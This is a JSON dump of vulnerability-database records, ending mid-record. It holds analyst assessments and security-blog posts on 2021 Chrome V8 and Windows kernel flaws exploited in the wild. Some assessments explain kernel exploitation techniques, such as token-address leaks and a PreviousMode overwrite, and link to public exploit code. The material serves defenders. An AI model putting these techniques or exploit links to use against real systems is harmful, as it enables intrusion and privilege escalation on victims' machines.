"_state": {"dependencies": 1659994789, "score": 1659970229}, "_internal": {"score_hash": "9da101d8a474ac6c4b3b36ab1d5663b7"}}
{"attackerkb": [{"lastseen": "2022-05-31T07:58:31", "description": "Type confusion in V8 in Google Chrome prior to 90.0.4430.85 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at June 17, 2021 3:06pm UTC reported:\n\nAccording to <https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/> this appears to have been used along with CVE-2021-31955 and CVE-2021-31956, a Windows kernel information leak and a Windows LPE vulnerability, to form a full RCE to go from a user browsing a web page to full SYSTEM control over a target Windows device. This is an extremely powerful and valuable exploit chain, and many exploit brokers are willing to pay large sums of money for these chains as they often are very valuable to nation states who wish to use them for their intelligence operations.\n\nOverall though, on its own it seems like this bug wasn\u2019t super valuable as you only get RCE within the sandbox itself, which is why it was then chained with a Windows kernel bug to escape the Chrome sandbox and gain RCE as SYSTEM on the target device. Therefore the risk for this vulnerability alone is lower, however if we keep in mind the other bugs that existed at the time, the overall risk is quite high.\n\nThere also appears to have been public exploit code available for this vulnerability, available at <https://github.com/avboy1337/1195777-chrome0day>, which was potentially reused by the attackers. In any case at the time that code was released the bug was still unpatched which lead researchers at Kaspersky to conclude that its likely attackers used the code from <https://github.com/avboy1337/1195777-chrome0day> in their attack.\n\nOtherwise this is your typical V8 type confusion bug. V8 seems to have had quite a few type confusion bugs in the past so this is nothing too new. If you want to limit exposure, disable JavaScript in your browser on untrusted sites, which will help prevent users from being exploited by these types of attacks as most of them rely on JavaScript to do set up the environment in Chrome appropriately. That being said disabling JavaScript will break most sites so take this with a grain of salt :)\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-04-26T00:00:00", "type": "attackerkb", "title": "CVE-2021-21224", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21224", "CVE-2021-31955", "CVE-2021-31956"], "modified": "2021-04-28T00:00:00", "id": "AKB:160D34D9-2175-4B27-87F8-0CED51121F50", "href": "https://attackerkb.com/topics/fLcfbPxB38/cve-2021-21224", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-21T14:33:10", "description": "Windows Kernel Information Disclosure Vulnerability \nThe type of information that could be disclosed if an attacker successfully exploited this vulnerability is the contents of Kernel memory. An attacker could read the contents of Kernel memory from a user mode process.\n\nThe team at Kaspersky have reported threat actors are exploiting this Microsoft Windows OS kernel vulnerability\n\nSource: <https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at June 17, 2021 3:23pm UTC reported:\n\nAh good old `NtQuerySystemInformation()` strikes again, never quite going out of style :) In this case CVE-2021-31955 is an information disclosure in good old `ntoskrnl.exe`, aka the Windows kernel itself, that occurs due to a Windows feature supported since Windows Vista known as SuperFetch. By sending a `SystemSuperfetchInformation` class request of type `SuperfetchPrivSourceQuery` via the undocumented `NtQuerySystemInformation()` function, one can obtain the kernel address of the `EPROCESS` structure for the current process. This is REALLY bad since the `EPROCESS` kernel structure contains also contains a pointer to the process\u2019s permissions token. If we know the address of this token, then, provided one has an arbitrary kernel write vulnerability, they can easily overwrite this pointer to point to the permissions token for a higher privilege process, and if this process is running as SYSTEM, they will gain SYSTEM level code execution.\n\nAccording to <https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>, this was used in the wild alongside CVE-2021-31956 to escape the Chrome sandbox and gain SYSTEM on affected users computers, after first compromising Chrome and gaining execution inside the Chrome sandbox with what is suspected to be CVE-2021-21224.\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "attackerkb", "title": "CVE-2021-31955", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21224", "CVE-2021-31955", "CVE-2021-31956"], "modified": "2021-06-08T00:00:00", "id": "AKB:21C170FF-C7C6-4BFB-8AED-613970EDA44C", "href": "https://attackerkb.com/topics/NQpSb1TpCN/cve-2021-31955", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-02T12:32:42", "description": "Windows NTFS Elevation of Privilege Vulnerability \nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system.\n\nAdditionally, an attacker could convince a local user to open a malicious file. The attacker would have to convince the user to click a link, typically by way of an enticement in an email or instant message, and then convince them to open the specially crafted file.\n\nThe team at Kaspersky have reported threat actors are exploiting this Microsoft Windows OS kernel vulnerability\n\nSource: <https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at June 17, 2021 4:04pm UTC reported:\n\nThis is a heap buffer overflow in `ntfs.sys`, one of the Windows kernel drivers, which was patched in June 2021. Heap vulnerabilities in the kernel are notoriously unreliable and hard to exploit, particularly given recent mitigations in Windows 8 and then later in Windows 10 that have introduced additional randomness to the kernel heap as well as additional state checks that will result in Windows terminating immediately if data does not look to be valid. Therefore realize that whilst this exploit has been exploited in the wild, I would imagine the reliability may be questionable or there may have been considerable work done behind the scenes to make the exploit more reliable.\n\nIn any case, the affected function is `NtfsQueryEaUserEaList()` in `ntfs.sys` which processes a list of extended attributes (this is where the `ea` part of the function name comes from) for a file and saves the retrieved values to a buffer. The problem here though is that users can make a Windows system call to access this function and `NtfsQueryEaUserEaList()` and its possible to control the size of the output buffer. However the output buffer\u2019s size has to be 32 bit aligned. This causes an issue as whilst the code does check to make sure the output buffer can hold the content of the extended attribute list with padding, it doesn\u2019t check for integer underflows, meaning that the check is done as though the number was an unsigned integer, yet when copying memory its treated as a signed integer, which can result in the number underflowing and becoming a large positive number, such that a lot of memory is copied into a very small buffer.\n\nThis is a particularly interesting case as most of the time when one combines an integer underflow/overflow with a heap buffer vulnerability, things don\u2019t tend to pan out so well due to the user corrupting too much memory to reliably control the heap. This can cause issues later on when Windows checks the heap state and suddenly finds everything is trashed, resulting in a BSOD if one corrupts kernel heap memory. For this reason, I\u2019m interested to see how the attackers actually managed to accurately control heap memory in this scenario to exploit the vulnerability.\n\nFrom the advisory we are given some hints that the Windows Notification Facility (WNF) was used along with this vulnerability to get arbitrary memory read and write primitives, which is a new kernel exploitation strategy I have not heard about before. It appears this was also new to Kaspersky as well as they mention they will be publishing more information about this technique in the future.\n\nAdditionally, showcasing the sophistication of the attackers who exploited this vulnerability, they also used a rarely used `PreviousMode` overwrite instead of stealing overwriting the `Token` field of the `EPROCESS` structure to steal the token. As mentioned at <https://github.com/oct0xor/presentations/blob/master/2019-02-Overview%20of%20the%20latest%20Windows%20OS%20kernel%20exploits%20found%20in%20the%20wild.pdf>, this field controls which mode the kernel was in prior to performing a system call. This can allow an attacker to perform sensitive actions by essentially tricking the OS into thinking a system call was made from kernel mode when in reality it was not.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 2\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "attackerkb", "title": "CVE-2021-31956", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31956"], "modified": "2021-06-08T00:00:00", "id": "AKB:03F5DDB7-DFAF-4815-9563-05762A387A0A", "href": "https://attackerkb.com/topics/Xixbnqn9qC/cve-2021-31956", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-19T20:39:50", "description": "Insufficient validation of untrusted input in V8 in Google Chrome prior to 89.0.4389.128 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-04-26T00:00:00", "type": "attackerkb", "title": "CVE-2021-21220", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21220"], "modified": "2021-04-27T00:00:00", "id": "AKB:7E06EF37-046E-4E9E-AD5A-F4C2477ECB9E", "href": "https://attackerkb.com/topics/guR2zJ2y2K/cve-2021-21220", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2021-10-21T14:41:47", "description": "Exploit kits (EK) are not as widespread as they used to be. One of the reasons is likely that most exploit kits targeted software that is hardly ever used anymore. Internet Explorer, Silverlight, and Flash Player to name a few, have been deprecated, replaced, and quickly lost their user-base.\n\nSo, just when you start thinking there is one less threat to worry much about, researchers have found an exploit kit with a keen interest in Chrome. Which, from a business point of view, makes a lot of sense, since Chrome is close to becoming not just a market leader, but almost a monopolist in the browser market.\n\nChrome has, at the time of writing, a market share of around 65%. The only other browser that reaches a market share that is over 10% is Safari. So if you are in the business of compromising browsers that visit your website or watch your advertisement, having Chrome users on your target list is a big plus.\n\nOr, as Malwarebytes' Director of Threat Intelligence, J\u00e9r\u00f4me Segura, put it:\n\n> "The future of exploit kits is via Chrome exploits. This could either be an anomaly or the beginning of a new era with big implications for the years to come."\n\n### Magnitude EK\n\nEnter the Magnitude exploit kit. [Researchers](<https://twitter.com/AvastThreatLabs/status/1450476708939767815>) have found that the Magnitude EK is actively using two vulnerabilities to exploit Chromium-based browsers. Magnitude is used in malvertising attacks to infect victims who visit compromised websites and its payload of choice is the [Magniber ransomware](<https://blog.malwarebytes.com/threat-analysis/2018/07/magniber-ransomware-improves-expands-within-asia/>). \n\n### The vulnerabilities\n\n[CVE-2021-21224](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21224>) is described as a type confusion in V8 in Google Chrome prior to 90.0.4430.85 which allows a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. V8 is Google's open source high-performance JavaScript and WebAssembly engine. This vulnerability was [patche](<https://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop_20.html>)[d in April](<https://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop_20.html>).\n\n[CVE-2021-31956](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31956>) is a Windows NTFS Elevation of Privilege (EoP) vulnerability. This vulnerability can be used in combination with CVE-2021-21224 to escape the Chromium sandbox. This vulnerability was [patched in June](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31956>).\n\n### PuzzleMaker\n\nPractically the same combination of vulnerabilities [was described in June](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/06/microsoft-fixes-seven-zero-days-including-two-puzzlemaker-targets-google-fixes-serious-android-flaw/>) when Microsoft fixed seven zero-days, including the CVE-2021-131956 we mentioned earlier. Back then, the attacker using these vulnerabilities was dubbed PuzzleMaker. At the time it was unknown which Chrome vulnerability was used by the attacker, but it's highly likely that it was the same as Magnitude has been found leveraging now.\n\n### Payload\n\nThere is no malicious payload attached to the Magnitude exploits yet, the attack just exfiltrates the victim's Windows build number. But reportedly, this is Magnitude EK\u2019s standard procedure to test out new exploits, so this could change quickly if they start to see positive results.\n\n### How to protect yourself\n\nIt is only on rare occasions that we write about vulnerabilities and then tell you there isn\u2019t much to worry about. But in this case, the only people that have anything to worry about are Windows users that browse the web using Chrome or Chromium based browsers (like Edge), but have disabled its automatic updates and haven\u2019t updated since April. You would also have to run on a non-updated Windows system since June, or run Chrome with the _-no-sandbox _switch (not recommended). And even then all that would happen if you ran across the Magnitude EK (which usually focuses on South Korea) is getting fingerprinted.\n\nBut you do understand that you should update your OS and browser nonetheless, right?\n\n### Enable automatic updates\n\nIf you want to save yourself the trouble of manually installing updates, there are a few things you can do. For Google Chrome (under Windows) you can choose this page as one of the tabs that opens when you run the browser: _chrome://settings/help_. If there has been an update since the last time you closed your browser, this page will alert you and initiate a download of the update.\n\nIn Windows 10 you can select the Start button, then select _Settings > Update & security > Windows Update_. Select _Advanced options_, and then under _Choose how updates are installed_, select _Automatic (recommended)_.\n\nStay safe, everyone!\n\nThe post [Chrome targeted by Magnitude exploit kit](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/10/magnitude-ek-has-been-spotted-targeting-the-chrome-browser/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-21T12:47:42", "type": "malwarebytes", "title": "Chrome targeted by Magnitude exploit kit", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-131956", "CVE-2021-21224", "CVE-2021-31956"], "modified": "2021-10-21T12:47:42", "id": "MALWAREBYTES:3322D6B92554507E3E44D06E2BA5E174", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/10/magnitude-ek-has-been-spotted-targeting-the-chrome-browser/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-14T16:36:43", "description": "A day late and a dollar short is a well-known expression that comes in a few variations. But this version has a movie and a book to its name, so I\u2019m going with this one. Why?\n\nGoogle has published an update for the Chrome browser that patches two newly discovered vulnerabilities. The browser's Stable channel has been updated to [89.0.4389.128](<https://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop.html>) for Windows, Mac and Linux. Both being exploited in the wild.\n\n> Google is aware of reports that exploits for CVE-2021-21206 and CVE-2021-21220 exist in the wild.\n\nNote that other browsers, such as Edge, Brave and Vivaldi are also based on Chrome and likely to be affected by the same issues.\n\n### Which vulnerabilities are patched?\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).\n\nThe first zero-day was listed as [CVE-2021-21220](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21220>) and was discovered at the Pwn2Own 2021 event last week. The vulnerability is caused by insufficient validation of untrusted input in V8, Google\u2019s high-performance JavaScript and WebAssembly engine that interprets code embedded in web pages.\n\nThe second zero-day was listed as [CVE-2021-21206](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21206>) and is described as a \u201cuse after free in Blink\u201d. Use after free (UAF) is a vulnerability caused by incorrect use of dynamic memory during a program\u2019s operation. If after freeing a memory location, a program does not clear the pointer to that memory, an attacker can use the error to manipulate the program. Blink is the name of the rendering engine used by Chromium to "draw" web pages.\n\n### Why did I say a day late?\n\nResearcher Rajvardhan Agarwal managed to publish a working exploit for CVE-2021-21220 (the vulnerability discovered at Pwn2Own) on GitHub over the weekend, by reverse-engineering a patch produced by the Chromium team. Chromium is the open source browser that Chrome is built upon, and it in turn is made up of components, like V8 and Blink. Fixes appear in Chromium first, and then Google packages them up, along with some Google-specific goodies, into a new version of the Chrome browser.\n\n> Just here to drop a chrome 0day. Yes you read that right.<https://t.co/sKDKmRYWBP> [pic.twitter.com/PpVJrVitLR](<https://t.co/PpVJrVitLR>)\n> \n> -- Rajvardhan Agarwal (@r4j0x00) [April 12, 2021](<https://twitter.com/r4j0x00/status/1381643526010597380?ref_src=twsrc%5Etfw>)\n\n### And why a dollar short?\n\nBecause the same researcher stated that (at the time) although the vulnerability affecting Chromium-based browsers had been patched in the latest version of V8, it worked against the current Chrome release, thereby leaving users potentially vulnerable to attacks.\n\nLuckily, although Agarwal proved that exploitation was possible, he stopped short of handing criminals the keys to the entire castle. Purposely, the published exploit only worked if users disabled their browser's sandbox, a sort of protective software cage that isolates the browser from the rest of the computer and protects it from exactly this kind of exploit. Criminals looking to use his exploit would have to chain it with a sandbox "escape", a technically difficult task (although not an impossible one, as the Pwn2Own winners proved).\n\n### The update\n\nThe easiest way to do it is to allow Chrome to update automatically, which basically uses the same method as outlined below but does not require your attention. But you can end up lagging behind if you never close the browser or if something goes wrong, such as an extension stopping you from updating the browser.\n\nSo, it doesn\u2019t hurt to check now and then. And now would be a good time, given the working exploits. My preferred method is to have Chrome open the page chrome://settings/help which you can also find by clicking **Settings > About Chrome**.\n\nIf there is an update available, Chrome will notify you and start downloading it. Then it will tell you all you have to do to complete the update is Relaunch the browser.\n\nAfter the update your version should be at 89.0.4389.128 or later\n\nStay safe, everyone!\n\nThe post [Update now! Chrome needs patching against two in-the-wild exploits](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/04/update-now-chrome-needs-patching-against-two-in-the-wild-exploits/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-14T15:01:58", "type": "malwarebytes", "title": "Update now! Chrome needs patching against two in-the-wild exploits", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21206", "CVE-2021-21220"], "modified": "2021-04-14T15:01:58", "id": "MALWAREBYTES:6F90B6DD790D455EDED4BE326079DA35", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/04/update-now-chrome-needs-patching-against-two-in-the-wild-exploits/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-14T18:35:22", "description": "Google _[announced](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop.html>)_ on Monday that it will be issuing patches for 11 high severity vulnerabilities found in Chrome, including two that are currently being exploited in the wild. The patch, which is part of the Stable Channel Update for Chrome 93 (93.0.4577.82), will be released for Windows, Mac, and Linux (if it hasn\u2019t already). Chrome users are expected to see the roll out in the coming days and weeks.\n\nReaders should note that other popular browsers such as Brave and Edge are also Chromium-based and therefore likely to be vulnerable to these flaws too. Keep an eye out for updates.\n\nYou can check what version of Chrome you are running by opening About Google Chrome from the main menu.\n\nThe About Google Chrome screen tells you what version you are running and whether it is up to date\n\n### The vulnerabilities\n\nThe fixes address high severity vulnerabilities reported to Google by independent researchers from as early as August of this year. That said, the company has included names of the researchers who found the flaws in their announcement.\n\nThe two vulnerabilities that are being actively exploited\u2014namely, [CVE-2021-30632](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30632>) and [CVE-2021-30633](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30633>)\u2014were submitted anonymously. The former is an "Out of bounds write" flaw in the V8 JavaScript engine and the latter is a "Use after free" bug in the Indexed DB API.\n\nBecause threat actors are currently exploiting the two aforementioned vulnerabilities, Google provides little to no information on how the attacks against these weaknesses are being carried out, or other precautionary measures users should be looking out for. Per Google:\n\n> Note: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven\u2019t yet fixed.\n\n### V8, the thorn in Chrome's side?\n\nNobody will be surprised to see that one of the in-the-wild exploits affects Chrome's V8 engine. \n\nAt the heart of every modern web browser sits a JavaScript interpreter, a component that does much of the heavy lifting for interactive web apps. In Chrome, that interpreter is V8. These components need to accommodate frequent updates and adhere to a bewildering array of web standards, while also being both fast and secure.\n\nChrome's [V8](<https://v8.dev/>) JavaScript engine has been a significant source of security problems. So significant in fact, that in August Microsoft\u2014whose Edge browser is based on Chrome\u2014announced an experimental project called [Super Duper Secure Mode](<https://blog.malwarebytes.com/reports/2021/08/edges-super-duper-secure-mode-benchmarked-how-much-speed-would-you-trade-for-security/>) that aims to tackle the rash of V8 problems by simply turning an important part of it off.\n\nA little under half of the CVEs issued for V8 relate to its Just-in-Time (JIT) compiler, and more than half of all \u2018in-the-wild\u2019 Chrome exploits abuse JIT bugs. Just-in-time compilation is an important performance feature and turning it off is a direct trade of speed for security. How much? According our quick-and-dirty testing, turning off the JIT compiler makes JavaScript execution twice as slow in Edge.\n\n### 11 zero-days and counting\n\nTo date, the Google Chrome team has patched 11 zero-day vulnerabilities in 2021. Previous patches are from the following vulnerabilities, some of which we have covered here in the Malwarebytes Labs blog:\n\n * [_CVE-2021-21148_](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/02/update-now-chrome-patches-zero-day-that-was-exploited-in-the-wild/>)\n * [_CVE-2021-21166_](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/update-now-chrome-fix-patches-in-the-wild-zero-day/>)\n * CVE-2021-21193\n * [_CVE-2021-21206_](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/04/update-now-chrome-needs-patching-against-two-in-the-wild-exploits/>)\n * [_CVE-2021-21220_](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/04/update-now-chrome-needs-patching-against-two-in-the-wild-exploits/>)\n * CVE-2021-21224\n * CVE-2021-30551\n * CVE-2021-30554\n * CVE-2021-30563\n\nWith so much bad PR, you might expect Chrome's market share to suffer; yet, it remains by far the most popular browser. Users\u2014and the Google Chrome brand\u2014seem unaffected.\n\nMake sure you update your Chrome or Chromium-based browser once you see the patch available, or better still, make sure your browser is set to [update itself](<https://support.google.com/chrome/answer/95414?hl=en-GB&co=GENIE.Platform%3DDesktop#:~:text=Go%20to%20'About%20Google%20Chrome,Chrome%20to%20apply%20the%20update.>).\n\nStay safe!\n\nThe post [Update now! Google Chrome fixes two in-the-wild zero-days](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-now-google-chrome-fixes-two-in-the-wild-zero-days/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-14T16:28:47", "type": "malwarebytes", "title": "Update now! Google Chrome fixes two in-the-wild zero-days", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633"], "modified": "2021-09-14T16:28:47", "id": "MALWAREBYTES:390E663F11CA04293C83488A40CB3A8A", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-now-google-chrome-fixes-two-in-the-wild-zero-days/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-06-15T08:32:16", "description": "This patch Tuesday harvest was another big one. The Windows updates alone included seven zero-day vulnerability updates, two of them are actively being used in the wild by a group called PuzzleMaker, four others that have also been seen in the wild, plus one other zero-day vulnerability not known to have been actively exploited. Add to that 45 vulnerabilities that were labelled important, and security updates for Android, Adobe, SAP, and Cisco. You can practically see the IT staff scrambling to figure out what to do first and what needs to be checked before applying the patches.\n\n### PuzzleMaker\n\nSecurity researchers have discovered a new threat actor dubbed [PuzzleMaker](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>), that was found using a chain of Google Chrome and Windows 10 zero-day exploits in highly targeted attacks against multiple companies worldwide. Unfortunately the researchers were unable to conclusively identify the Chrome vulnerability that was used (but they do have a suspect). The good news is that the two Windows vulnerabilities in the attack chain were included in the Windows 10 KB5003637 & KB5003635 cumulative updates. These vulnerabilities are listed as [CVE-2021-31955](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31955>), a Windows 